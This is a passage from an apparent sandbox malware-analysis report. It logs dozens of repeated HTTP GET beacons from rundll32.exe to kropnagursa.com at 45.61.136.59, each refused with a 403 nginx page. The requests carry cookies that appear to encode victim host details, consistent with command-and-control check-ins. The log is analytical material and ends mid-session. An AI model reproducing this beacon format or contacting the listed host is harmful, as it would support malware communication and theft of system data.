                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            281192.168.2.44997745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:45.305970907 CET2466OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:45.479681969 CET2467INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            282192.168.2.44997845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:45.784344912 CET2468OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:45.948961973 CET2468INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            283192.168.2.44997945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:46.394429922 CET2469OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:46.559201002 CET2469INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            284192.168.2.44998045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:46.878473043 CET2470OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:47.043617964 CET2471INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            285192.168.2.44998145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:47.342403889 CET2471OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:47.507041931 CET2472INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            286192.168.2.44998245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:47.825387955 CET2473OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:47.990009069 CET2473INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            287192.168.2.44998345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:48.298557043 CET2474OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:48.463285923 CET2474INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            288192.168.2.44998445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:48.779122114 CET2475OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:48.944104910 CET2476INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            289192.168.2.44998545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:49.853785992 CET2476OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:50.018563032 CET2477INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:49 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            29192.168.2.44972545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:16.881808996 CET2144OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:17.046669006 CET2145INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:16 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            290192.168.2.44998645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:50.581196070 CET2478OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:50.748590946 CET2478INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            291192.168.2.44998745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:51.049133062 CET2479OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:51.217731953 CET2479INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            292192.168.2.44998845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:51.522034883 CET2480OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:51.687874079 CET2481INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            293192.168.2.44998945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:51.997380972 CET2482OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:52.165290117 CET2482INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:52 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            294192.168.2.44999045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:52.702811003 CET2483OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:52.867424011 CET2483INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:52 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            295192.168.2.44999145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:53.563119888 CET2484OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
